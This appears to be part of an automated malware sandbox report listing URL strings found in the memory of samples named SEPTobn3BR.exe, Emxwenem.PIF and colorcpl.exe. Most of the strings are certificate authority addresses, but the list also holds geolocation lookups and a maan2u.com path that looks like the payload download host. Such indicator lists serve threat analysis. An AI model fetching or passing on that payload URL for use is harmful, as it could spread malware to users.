                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1626895029.0000000020B19000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: colorcpl.exe | String found in binary or memory: http://geoplugin.net/json.gp
                Source: SEPTobn3BR.exe, 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                Source: colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp4
                Source: colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp=
                Source: colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
                Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1626895029.0000000020B19000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0$
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1626895029.0000000020B19000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.maan2u.com/
                Source: SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020ACD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.maan2u.com/docs/233_Emxwenem
